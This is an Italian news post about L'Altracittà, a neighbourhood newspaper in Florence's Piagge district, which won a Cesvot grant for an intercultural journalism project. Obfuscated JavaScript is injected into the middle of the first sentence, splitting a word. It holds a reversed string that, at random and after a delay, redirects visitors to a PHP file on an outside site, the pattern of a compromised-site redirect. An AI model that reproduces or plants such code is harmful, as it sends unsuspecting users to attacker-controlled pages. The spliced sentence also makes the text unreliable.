L'Altracittà vince il I° Bando Cesvot.

image_pdfimage_print

‘Comunicare intercultura e fare rete’ è il titolo del progetto vincitore del I° B (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando di Concorso Cesvot Percorsi di Innovazione. Il progetto, proposto dalla redazione dell’Altracittà – giornale della periferia edito dall’associazione Il Muretto delle Piagge, è stato premiato oggi 18 dicembre con un contributo di 18.730 euro presso la sede Rai di Firenze.

L’obiettivo del progetto è quello di favorire la comunicazione e lo scambio interculturale tra immigrati e autoctoni attraverso un corso di giornalismo di base e l’ampliamento del ‘Laboratorio permanente di comunicazione sociale’ attivo alle Piagge e legato al progetto Altracittà. L’iniziativa mira alla creazione di un osservatorio di base sui bisogni sociali e sui progetti in corso nel settore dell’immigrazione e cercherà di fornire ad una potenziale redazione multiculturale gli strumenti per fare comunicazione dal basso e monitorare le realtà di riferimento, i disagi, ma anche le soluzioni che enti e organizzazioni locali offrono sul territorio.

L’Altracittà ha una tiratura di 5000 copie ed è un’esperienza di informazione dal basso nata nel 1995 nel quartiere periferico delle Piagge. Protagonista della realizzazione un gruppo di 15 persone che cura anche Agenzia di Base, newsletter elettronica con 2000 iscritti, sugli appuntamenti dell’associazionismo fiorentino.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *